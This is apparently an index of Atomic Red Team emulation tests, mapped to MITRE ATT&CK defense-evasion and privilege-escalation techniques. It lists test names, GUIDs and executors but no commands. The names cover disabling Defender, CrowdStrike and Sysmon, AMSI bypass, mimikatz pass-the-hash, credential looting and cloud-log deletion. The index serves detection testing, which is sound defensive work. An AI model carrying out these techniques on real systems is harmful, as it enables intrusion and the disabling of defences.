346 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 3 Remove Network Share PowerShell 0512d214-9512-4d22-bde7-f37e058259b3 powershell
347 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 4 Disable Administrative Share Creation at Startup 99c657aa-ebeb-4179-a665-69288fdd12b8 command_prompt
348 defense-evasion T1070.005 Indicator Removal on Host: Network Share Connection Removal 5 Remove Administrative Shares 4299eff5-90f1-4446-b2f3-7f4f5cfd5d62 command_prompt
349 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 1 Disable syslog 4ce786f8-e601-44b5-bfae-9ebb15a7d1c8 sh
350 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 2 Disable Cb Response ae8943f7-0f8d-44de-962d-fbc2e2f03eb8 sh
351 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 3 Disable SELinux fc225f36-9279-4c39-b3f9-5141ab74f8d8 sh
352 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 4 Stop Crowdstrike Falcon on Linux 828a1278-81cc-4802-96ab-188bf29ca77d sh
353 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 5 Disable Carbon Black Response 8fba7766-2d11-4b4a-979a-1e3d9cc9a88c sh
354 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 6 Disable LittleSnitch 62155dd8-bb3d-4f32-b31c-6532ff3ac6a3 sh
355 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 7 Disable OpenDNS Umbrella 07f43b33-1e15-4e99-be70-bc094157c849 sh
356 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 8 Disable macOS Gatekeeper 2a821573-fb3f-4e71-92c3-daac7432f053 sh
357 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 9 Stop and unload Crowdstrike Falcon on macOS b3e7510c-2d4c-4249-a33f-591a2bc83eef sh
358 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 10 Unload Sysmon Filter Driver 811b3e76-c41b-430c-ac0d-e2380bfaa164 command_prompt
359 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 11 Uninstall Sysmon a316fb2e-5344-470d-91c1-23e15c374edc command_prompt
360 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 12 AMSI Bypass - AMSI InitFailed 695eed40-e949-40e5-b306-b4031e4154bd powershell
361 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 13 AMSI Bypass - Remove AMSI Provider Reg Key 13f09b91-c953-438e-845b-b585e51cac9b powershell
362 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 14 Disable Arbitrary Security Windows Service a1230893-56ac-4c81-b644-2108e982f8f5 command_prompt
363 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 15 Tamper with Windows Defender ATP PowerShell 6b8df440-51ec-4d53-bf83-899591c9b5d7 powershell
364 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 16 Tamper with Windows Defender Command Prompt aa875ed4-8935-47e2-b2c5-6ec00ab220d2 command_prompt
365 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 17 Tamper with Windows Defender Registry 1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45 powershell
366 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 18 Disable Microsoft Office Security Features 6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7 powershell
367 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 19 Remove Windows Defender Definition Files 3d47daaa-2f56-43e0-94cc-caf5d8d52a68 command_prompt
368 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 20 Stop and Remove Arbitrary Security Windows Service ae753dda-0f15-4af6-a168-b9ba16143143 powershell
369 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 21 Uninstall Crowdstrike Falcon on Windows b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297 powershell
370 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 22 Tamper with Windows Defender Evade Scanning -Folder 0b19f4ee-de90-4059-88cb-63c800c683ed powershell
371 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 23 Tamper with Windows Defender Evade Scanning -Extension 315f4be6-2240-4552-b3e1-d1047f5eecea powershell
372 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 24 Tamper with Windows Defender Evade Scanning -Process a123ce6a-3916-45d6-ba9c-7d4081315c27 powershell
373 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 25 office-365-Disable-AntiPhishRule b9bbae2c-2ba6-4cf3-b452-8e8f908696f3 powershell
374 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 26 Disable Windows Defender with DISM 871438ac-7d6e-432a-b27d-3e7db69faf58 command_prompt
375 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 27 Disable Defender Using NirSoft AdvancedRun 81ce22fd-9612-4154-918e-8a1f285d214d powershell
376 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 28 Kill antimalware protected processes using Backstab 24a12b91-05a7-4deb-8d7f-035fa98591bc powershell
377 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 29 WinPwn - Kill the event log services for stealth 7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66 powershell
378 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 30 Tamper with Windows Defender ATP using Aliases - PowerShell c531aa6e-9c97-4b29-afee-9b7be6fc8a64 powershell
379 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 31 LockBit Black - Disable Privacy Settings Experience Using Registry -cmd d6d22332-d07d-498f-aea0-6139ecb7850e command_prompt
380 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 32 LockBit Black - Use Registry Editor to turn on automatic logon -cmd 9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70 command_prompt
381 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 33 LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell d8c57eaa-497a-4a08-961e-bd5efd7c9374 powershell
382 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 34 Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell 5e27f36d-5132-4537-b43b-413b0d5eec9a powershell
383 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 35 Disable Windows Defender with PwSh Disable-WindowsOptionalFeature f542ffd3-37b4-4528-837f-682874faa012 powershell
384 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 36 WMIC Tamper with Windows Defender Evade Scanning Folder 59d386fc-3a4b-41b8-850d-9e3eee24dfe4 command_prompt
385 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 37 Delete Windows Defender Scheduled Tasks 4b841aa1-0d05-4b32-bbe7-7564346e7c76 command_prompt
386 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 38 Clear History 23b88394-091b-4968-a42d-fb8076992443 sh
387 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 39 Suspend History 94f6a1c9-aae7-46a4-9083-2bb1f5768ec4 sh
388 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 40 Reboot Linux Host via Kernel System Request 6d6d3154-1a52-4d1a-9d51-92ab8148b32e sh
389 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 41 Clear Pagging Cache f790927b-ea85-4a16-b7b2-7eb44176a510 sh
390 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 42 Disable Memory Swap e74e4c63-6fde-4ad2-9ee8-21c3a1733114 sh
391 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 43 Disable Hypervisor-Enforced Code Integrity (HVCI) 70bd71e6-eba4-4e00-92f7-617911dbe020 powershell
392 defense-evasion T1055.012 Process Injection: Process Hollowing 1 Process Hollowing using PowerShell 562427b4-39ef-4e8c-af88-463a78e70b9c powershell
393 defense-evasion T1055.012 Process Injection: Process Hollowing 2 RunPE via VBA 3ad4a037-1598-4136-837c-4027e4fa319b powershell
394 defense-evasion T1027 Obfuscated Files or Information 1 Decode base64 Data into Script f45df6be-2e1e-4136-a384-8f18ab3826fb sh
395 defense-evasion T1027 Obfuscated Files or Information 2 Execute base64-encoded PowerShell a50d5a97-2531-499e-a1de-5544c74432c6 powershell
396 defense-evasion T1027 Obfuscated Files or Information 3 Execute base64-encoded PowerShell from Windows Registry 450e7218-7915-4be4-8b9b-464a49eafcec powershell
397 defense-evasion T1027 Obfuscated Files or Information 4 Execution from Compressed File f8c8a909-5f29-49ac-9244-413936ce6d1f command_prompt
398 defense-evasion T1027 Obfuscated Files or Information 5 DLP Evasion via Sensitive Data in VBA Macro over email 129edb75-d7b8-42cd-a8ba-1f3db64ec4ad powershell
399 defense-evasion T1027 Obfuscated Files or Information 6 DLP Evasion via Sensitive Data in VBA Macro over HTTP e2d85e66-cb66-4ed7-93b1-833fc56c9319 powershell
400 defense-evasion T1027 Obfuscated Files or Information 7 Obfuscated Command in PowerShell 8b3f4ed6-077b-4bdd-891c-2d237f19410f powershell
401 defense-evasion T1027 Obfuscated Files or Information 8 Obfuscated Command Line using special Unicode characters e68b945c-52d0-4dd9-a5e8-d173d70c448f manual
402 defense-evasion T1027 Obfuscated Files or Information 9 Snake Malware Encrypted crmlog file 7e47ee60-9dd1-4269-9c4f-97953b183268 powershell
403 defense-evasion T1027 Obfuscated Files or Information 10 Execution from Compressed JScript File fad04df1-5229-4185-b016-fb6010cd87ac command_prompt
404 defense-evasion T1564.006 Run Virtual Instance 1 Register Portable Virtualbox c59f246a-34f8-4e4d-9276-c295ef9ba0dd command_prompt
405 defense-evasion T1564.006 Run Virtual Instance 2 Create and start VirtualBox virtual machine 88b81702-a1c0-49a9-95b2-2dd53d755767 command_prompt
406 defense-evasion T1564.006 Run Virtual Instance 3 Create and start Hyper-V virtual machine fb8d4d7e-f5a4-481c-8867-febf13f8b6d3 powershell
407 defense-evasion T1134.005 Access Token Manipulation: SID-History Injection 1 Injection SID-History with mimikatz 6bef32e5-9456-4072-8f14-35566fb85401 command_prompt
408 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 1 Regsvr32 local COM scriptlet execution 449aa403-6aba-47ce-8a37-247d21ef0306 command_prompt
409 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 2 Regsvr32 remote COM scriptlet execution c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36 command_prompt
410 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 3 Regsvr32 local DLL execution 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b command_prompt
411 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 4 Regsvr32 Registering Non DLL 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 command_prompt
412 defense-evasion T1218.010 Signed Binary Proxy Execution: Regsvr32 5 Regsvr32 Silent DLL Install Call DllRegisterServer 9d71c492-ea2e-4c08-af16-c6994cdf029f command_prompt
413 defense-evasion T1036.003 Masquerading: Rename System Utilities 1 Masquerading as Windows LSASS process 5ba5a3d1-cf3c-4499-968a-a93155d1f717 command_prompt
414 defense-evasion T1036.003 Masquerading: Rename System Utilities 2 Masquerading as Linux crond process. a315bfff-7a98-403b-b442-2ea1b255e556 sh
415 defense-evasion T1036.003 Masquerading: Rename System Utilities 3 Masquerading - cscript.exe running as notepad.exe 3a2a578b-0a01-46e4-92e3-62e2859b42f0 command_prompt
416 defense-evasion T1036.003 Masquerading: Rename System Utilities 4 Masquerading - wscript.exe running as svchost.exe 24136435-c91a-4ede-9da1-8b284a1c1a23 command_prompt
417 defense-evasion T1036.003 Masquerading: Rename System Utilities 5 Masquerading - powershell.exe running as taskhostw.exe ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa command_prompt
418 defense-evasion T1036.003 Masquerading: Rename System Utilities 6 Masquerading - non-windows exe running as windows exe bc15c13f-d121-4b1f-8c7d-28d95854d086 powershell
419 defense-evasion T1036.003 Masquerading: Rename System Utilities 7 Masquerading - windows exe running as different windows exe c3d24a39-2bfe-4c6a-b064-90cd73896cb0 powershell
420 defense-evasion T1036.003 Masquerading: Rename System Utilities 8 Malicious process Masquerading as LSM.exe 83810c46-f45e-4485-9ab6-8ed0e9e6ed7f command_prompt
421 defense-evasion T1036.003 Masquerading: Rename System Utilities 9 File Extension Masquerading c7fa0c3b-b57f-4cba-9118-863bf4e653fc command_prompt
422 defense-evasion T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
423 defense-evasion T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm 1 Regasm Uninstall Method Call Test 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112 command_prompt
424 defense-evasion T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm 2 Regsvcs Uninstall Method Call Test fd3c1c6a-02d2-4b72-82d9-71c527abb126 powershell
425 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 1 Install root CA on CentOS/RHEL 9c096ec4-fd42-419d-a762-d64cc950627e sh
426 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 2 Install root CA on Debian/Ubuntu 53bcf8a0-1549-4b85-b919-010c56d724ff sh
427 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 3 Install root CA on macOS cc4a0b8c-426f-40ff-9426-4e10e5bf4c49 sh
428 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 4 Install root CA on Windows 76f49d86-5eb1-461a-a032-a480f86652f1 powershell
429 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 5 Install root CA on Windows with certutil 5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f powershell
430 defense-evasion T1553.004 Subvert Trust Controls: Install Root Certificate 6 Add Root Certificate to CurrentUser Certificate Store ca20a3f1-42b5-4e21-ad3f-1049199ec2e0 powershell
431 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 1 Compile After Delivery using csc.exe ffcdbd6a-b0e8-487d-927a-09127fe9a206 command_prompt
432 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 2 Dynamic C# Compile 453614d8-3ba6-4147-acc0-7ec4b3e1faef powershell
433 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 3 C compile d0377aa6-850a-42b2-95f0-de558d80be57 bash
434 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 4 CC compile da97bb11-d6d0-4fc1-b445-e443d1346efe bash
435 defense-evasion T1027.004 Obfuscated Files or Information: Compile After Delivery 5 Go compile 78bd3fa7-773c-449e-a978-dc1f1500bc52 bash
436 defense-evasion T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
437 defense-evasion T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
438 defense-evasion T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
439 defense-evasion T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
440 defense-evasion T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild 1 MSBuild Bypass Using Inline Tasks (C#) 58742c0f-cb01-44cd-a60b-fb26e8871c93 command_prompt
441 defense-evasion T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild 2 MSBuild Bypass Using Inline Tasks (VB) ab042179-c0c5-402f-9bc8-42741f5ce359 command_prompt
442 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 1 AWS - CloudTrail Changes 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e sh
443 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 2 Azure - Eventhub Deletion 5e09bed0-7d33-453b-9bf3-caea32bff719 powershell
444 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 3 Office 365 - Exchange Audit Log Disabled 1ee572f3-056c-4632-a7fc-7e7c42b1543c powershell
445 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 4 AWS - Disable CloudTrail Logging Through Event Selectors using Stratus a27418de-bdce-4ebd-b655-38f11142bf0c sh
446 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 5 AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus 22d89a2f-d475-4895-b2d4-68626d49c029 sh
447 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 6 AWS - Remove VPC Flow Logs using Stratus 93c150f5-ad7b-4ee3-8992-df06dec2ac79 sh
448 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 7 AWS - CloudWatch Log Group Deletes 89422c87-b57b-4a04-a8ca-802bb9d06121 sh
449 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 8 AWS CloudWatch Log Stream Deletes 33ca84bc-4259-4943-bd36-4655dc420932 sh
450 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 9 Office 365 - Set Audit Bypass For a Mailbox c9a2f6fe-7197-488c-af6d-10c782121ca6 powershell
451 defense-evasion T1564.003 Hide Artifacts: Hidden Window 1 Hidden Window f151ee37-9e2b-47e6-80e4-550b9f999b7a powershell
452 defense-evasion T1027.006 HTML Smuggling 1 HTML Smuggling Remote Payload 30cbeda4-08d9-42f1-8685-197fad677734 powershell
| Tactic | Technique # | Technique Name | Test # | Test Name | Test GUID | Executor Name |
|---|---|---|---|---|---|---|
| defense-evasion | T1070.004 | Indicator Removal on Host: File Deletion | 1 | Delete a single file - Linux/macOS | 562d737f-2fc6-4b09-8c2a-7f8ff0828480 | sh |
| defense-evasion | T1070.004 | Indicator Removal on Host: File Deletion | 2 | Delete an entire folder - Linux/macOS | a415f17e-ce8d-4ce2-a8b4-83b674e7017e | sh |
| defense-evasion | T1070.004 | Indicator Removal on Host: File Deletion | 3 | Overwrite and delete a file with shred | 039b4b10-2900-404b-b67f-4b6d49aa6499 | sh |
| defense-evasion | T1070.004 | Indicator Removal on Host: File Deletion | 4 | Delete a single file - Windows cmd | 861ea0b4-708a-4d17-848d-186c9c7f17e3 | command_prompt |
| defense-evasion | T1070.004 | Indicator Removal on Host: File Deletion | 5 | Delete an entire folder - Windows cmd | ded937c4-2add-42f7-9c2c-c742b7a98698 | command_prompt |
| defense-evasion | T1070.004 | Indicator Removal on Host: File Deletion | 6 | Delete a single file - Windows PowerShell | 9dee89bd-9a98-4c4f-9e2d-4256690b0e72 | powershell |
| defense-evasion | T1070.004 | Indicator Removal on Host: File Deletion | 7 | Delete an entire folder - Windows PowerShell | edd779e4-a509-4cba-8dfa-a112543dbfb1 | powershell |
| defense-evasion | T1070.004 | Indicator Removal on Host: File Deletion | 8 | Delete Filesystem - Linux | f3aa95fe-4f10-4485-ad26-abf22a764c52 | bash |
| defense-evasion | T1070.004 | Indicator Removal on Host: File Deletion | 9 | Delete Prefetch File | 36f96049-0ad7-4a5f-8418-460acaeb92fb | powershell |
| defense-evasion | T1070.004 | Indicator Removal on Host: File Deletion | 10 | Delete TeamViewer Log Files | 69f50a5f-967c-4327-a5bb-e1a9a9983785 | powershell |
| defense-evasion | T1221 | Template Injection | 1 | WINWORD Remote Template Injection | 1489e08a-82c7-44ee-b769-51b72d03521d | command_prompt |
| defense-evasion | T1027.002 | Obfuscated Files or Information: Software Packing | 1 | Binary simply packed by UPX (linux) | 11c46cd8-e471-450e-acb8-52a1216ae6a4 | sh |
| defense-evasion | T1027.002 | Obfuscated Files or Information: Software Packing | 2 | Binary packed by UPX, with modified headers (linux) | f06197f8-ff46-48c2-a0c6-afc1b50665e1 | sh |
| defense-evasion | T1027.002 | Obfuscated Files or Information: Software Packing | 3 | Binary simply packed by UPX | b16ef901-00bb-4dda-b4fc-a04db5067e20 | sh |
| defense-evasion | T1027.002 | Obfuscated Files or Information: Software Packing | 4 | Binary packed by UPX, with modified headers | 4d46e16b-5765-4046-9f25-a600d3e65e4d | sh |
| defense-evasion | T1036.006 | Masquerading: Space after Filename | 1 | Space After Filename (Manual) | 89a7dd26-e510-4c9f-9b15-f3bae333360f | manual |
| defense-evasion | T1036.006 | Masquerading: Space after Filename | 2 | Space After Filename | b95ce2eb-a093-4cd8-938d-5258cef656ea | bash |
| defense-evasion | T1550.002 | Use Alternate Authentication Material: Pass the Hash | 1 | Mimikatz Pass the Hash | ec23cef9-27d9-46e4-a68d-6f75f7b86908 | command_prompt |
| defense-evasion | T1550.002 | Use Alternate Authentication Material: Pass the Hash | 2 | crackmapexec Pass the Hash | eb05b028-16c8-4ad8-adea-6f5b219da9a9 | command_prompt |
| defense-evasion | T1550.002 | Use Alternate Authentication Material: Pass the Hash | 3 | Invoke-WMIExec Pass the Hash | f8757545-b00a-4e4e-8cfb-8cfb961ee713 | powershell |
| defense-evasion | T1574.002 | Hijack Execution Flow: DLL Side-Loading | 1 | DLL Side-Loading using the Notepad++ GUP.exe binary | 65526037-7079-44a9-bda1-2cb624838040 | command_prompt |
| defense-evasion | T1574.002 | Hijack Execution Flow: DLL Side-Loading | 2 | DLL Side-Loading using the dotnet startup hook environment variable | d322cdd7-7d60-46e3-9111-648848da7c02 | command_prompt |
| defense-evasion | T1220 | XSL Script Processing | 1 | MSXSL Bypass using local files | ca23bfb2-023f-49c5-8802-e66997de462d | command_prompt |
| defense-evasion | T1220 | XSL Script Processing | 2 | MSXSL Bypass using remote files | a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 | command_prompt |
| defense-evasion | T1220 | XSL Script Processing | 3 | WMIC bypass using local XSL file | 1b237334-3e21-4a0c-8178-b8c996124988 | command_prompt |
| defense-evasion | T1220 | XSL Script Processing | 4 | WMIC bypass using remote XSL file | 7f5be499-33be-4129-a560-66021f379b9b | command_prompt |
| defense-evasion | T1564.001 | Hide Artifacts: Hidden Files and Directories | 1 | Create a hidden file in a hidden directory | 61a782e5-9a19-40b5-8ba4-69a4b9f3d7be | sh |
| defense-evasion | T1564.001 | Hide Artifacts: Hidden Files and Directories | 2 | Mac Hidden file | cddb9098-3b47-4e01-9d3b-6f5f323288a9 | sh |
| defense-evasion | T1564.001 | Hide Artifacts: Hidden Files and Directories | 3 | Create Windows System File with Attrib | f70974c8-c094-4574-b542-2c545af95a32 | command_prompt |
| defense-evasion | T1564.001 | Hide Artifacts: Hidden Files and Directories | 4 | Create Windows Hidden File with Attrib | dadb792e-4358-4d8d-9207-b771faa0daa5 | command_prompt |
| defense-evasion | T1564.001 | Hide Artifacts: Hidden Files and Directories | 5 | Hidden files | 3b7015f2-3144-4205-b799-b05580621379 | sh |
| defense-evasion | T1564.001 | Hide Artifacts: Hidden Files and Directories | 6 | Hide a Directory | b115ecaf-3b24-4ed2-aefe-2fcb9db913d3 | sh |
| defense-evasion | T1564.001 | Hide Artifacts: Hidden Files and Directories | 7 | Show all hidden files | 9a1ec7da-b892-449f-ad68-67066d04380c | sh |
| defense-evasion | T1564.001 | Hide Artifacts: Hidden Files and Directories | 8 | Hide Files Through Registry | f650456b-bd49-4bc1-ae9d-271b5b9581e7 | command_prompt |
| defense-evasion | T1078.004 | Valid Accounts: Cloud Accounts | 1 | Creating GCP Service Account and Service Account Key | 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e | sh |
| defense-evasion | T1078.004 | Valid Accounts: Cloud Accounts | 2 | Azure Persistence Automation Runbook Created or Modified | 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac | powershell |
| defense-evasion | T1564.004 | Hide Artifacts: NTFS File Attributes | 1 | Alternate Data Streams (ADS) | 8822c3b0-d9f9-4daf-a043-49f4602364f4 | command_prompt |
| defense-evasion | T1564.004 | Hide Artifacts: NTFS File Attributes | 2 | Store file in Alternate Data Stream (ADS) | 2ab75061-f5d5-4c1a-b666-ba2a50df5b02 | powershell |
| defense-evasion | T1564.004 | Hide Artifacts: NTFS File Attributes | 3 | Create ADS command prompt | 17e7637a-ddaf-4a82-8622-377e20de8fdb | command_prompt |
| defense-evasion | T1564.004 | Hide Artifacts: NTFS File Attributes | 4 | Create ADS PowerShell | 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1 | powershell |
| defense-evasion | T1055.001 | Process Injection: Dynamic-link Library Injection | 1 | Process Injection via mavinject.exe | 74496461-11a1-4982-b439-4d87a550d254 | powershell |
| defense-evasion | T1055.001 | Process Injection: Dynamic-link Library Injection | 2 | WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique | 8b56f787-73d9-4f1d-87e8-d07e89cbc7f5 | powershell |
| defense-evasion | T1216 | Signed Script Proxy Execution | 1 | SyncAppvPublishingServer Signed Script PowerShell Command Execution | 275d963d-3f36-476c-8bef-a2a3960ee6eb | command_prompt |
| defense-evasion | T1216 | Signed Script Proxy Execution | 2 | manage-bde.wsf Signed Script Command Execution | 2a8f2d3c-3dec-4262-99dd-150cb2a4d63a | command_prompt |
| defense-evasion | T1078.003 | Valid Accounts: Local Accounts | 1 | Create local account with admin privileges | a524ce99-86de-4db6-b4f9-e08f35a47a15 | command_prompt |
| defense-evasion | T1078.003 | Valid Accounts: Local Accounts | 2 | Create local account with admin privileges - MacOS | f1275566-1c26-4b66-83e3-7f9f7f964daa | bash |
| defense-evasion | T1078.003 | Valid Accounts: Local Accounts | 3 | Create local account with admin privileges using sysadminctl utility - MacOS | 191db57d-091a-47d5-99f3-97fde53de505 | bash |
| defense-evasion | T1078.003 | Valid Accounts: Local Accounts | 4 | Enable root account using dsenableroot utility - MacOS | 20b40ea9-0e17-4155-b8e6-244911a678ac | bash |
| defense-evasion | T1078.003 | Valid Accounts: Local Accounts | 5 | Add a new/existing user to the admin group using dseditgroup utility - macOS | 433842ba-e796-4fd5-a14f-95d3a1970875 | bash |
| defense-evasion | T1078.003 | Valid Accounts: Local Accounts | 6 | WinPwn - Loot local Credentials - powerhell kittie | 9e9fd066-453d-442f-88c1-ad7911d32912 | powershell |
| defense-evasion | T1078.003 | Valid Accounts: Local Accounts | 7 | WinPwn - Loot local Credentials - Safetykatz | e9fdb899-a980-4ba4-934b-486ad22e22f4 | powershell |
| defense-evasion | T1078.003 | Valid Accounts: Local Accounts | 8 | Create local account (Linux) | 02a91c34-8a5b-4bed-87af-501103eb5357 | bash |
| defense-evasion | T1078.003 | Valid Accounts: Local Accounts | 9 | Reactivate a locked/expired account (Linux) | d2b95631-62d7-45a3-aaef-0972cea97931 | bash |
| defense-evasion | T1078.003 | Valid Accounts: Local Accounts | 10 | Login as nobody (Linux) | 3d2cd093-ee05-41bd-a802-59ee5c301b85 | bash |
| defense-evasion | T1127 | Trusted Developer Utilities Proxy Execution | 1 | Lolbin Jsc.exe compile javascript to exe | 1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8 | command_prompt |
| defense-evasion | T1127 | Trusted Developer Utilities Proxy Execution | 2 | Lolbin Jsc.exe compile javascript to dll | 3fc9fea2-871d-414d-8ef6-02e85e322b80 | command_prompt |
| defense-evasion | T1574.012 | Hijack Execution Flow: COR_PROFILER | 1 | User scope COR_PROFILER | 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a | powershell |
| defense-evasion | T1574.012 | Hijack Execution Flow: COR_PROFILER | 2 | System Scope COR_PROFILER | f373b482-48c8-4ce4-85ed-d40c8b3f7310 | powershell |
| defense-evasion | T1574.012 | Hijack Execution Flow: COR_PROFILER | 3 | Registry-free process scope COR_PROFILER | 79d57242-bbef-41db-b301-9d01d9f6e817 | powershell |
| privilege-escalation | T1053.005 | Scheduled Task/Job: Scheduled Task | 1 | Scheduled Task Startup Script | fec27f65-db86-4c2d-b66c-61945aee87c2 | command_prompt |
| privilege-escalation | T1053.005 | Scheduled Task/Job: Scheduled Task | 2 | Scheduled task Local | 42f53695-ad4a-4546-abb6-7d837f644a71 | command_prompt |
| privilege-escalation | T1053.005 | Scheduled Task/Job: Scheduled Task | 3 | Scheduled task Remote | 2e5eac3e-327b-4a88-a0c0-c4057039a8dd | command_prompt |
| privilege-escalation | T1053.005 | Scheduled Task/Job: Scheduled Task | 4 | Powershell Cmdlet Scheduled Task | af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd | powershell |
| privilege-escalation | T1053.005 | Scheduled Task/Job: Scheduled Task | 5 | Task Scheduler via VBA | ecd3fa21-7792-41a2-8726-2c5c673414d3 | powershell |
| privilege-escalation | T1053.005 | Scheduled Task/Job: Scheduled Task | 6 | WMI Invoke-CimMethod Scheduled Task | e16b3b75-dc9e-4cde-a23d-dfa2d0507b3b | powershell |
| privilege-escalation | T1053.005 | Scheduled Task/Job: Scheduled Task | 7 | Scheduled Task Executing Base64 Encoded Commands From Registry | e895677d-4f06-49ab-91b6-ae3742d0a2ba | command_prompt |
| privilege-escalation | T1053.005 | Scheduled Task/Job: Scheduled Task | 8 | Import XML Schedule Task with Hidden Attribute | cd925593-fbb4-486d-8def-16cbdf944bf4 | powershell |
| privilege-escalation | T1053.005 | Scheduled Task/Job: Scheduled Task | 9 | PowerShell Modify A Scheduled Task | dda6fc7b-c9a6-4c18-b98d-95ec6542af6d | powershell |
| privilege-escalation | T1546.013 | Event Triggered Execution: PowerShell Profile | 1 | Append malicious start-process cmdlet | 090e5aa5-32b6-473b-a49b-21e843a56896 | powershell |
| privilege-escalation | T1053.007 | Kubernetes Cronjob | 1 | ListCronjobs | ddfb0bc1-3c3f-47e9-a298-550ecfefacbd | bash |
| privilege-escalation | T1053.007 | Kubernetes Cronjob | 2 | CreateCronjob | f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 | bash |
| privilege-escalation | T1548.002 | Abuse Elevation Control Mechanism: Bypass User Account Control | 1 | Bypass UAC using Event Viewer (cmd) | 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 | command_prompt |
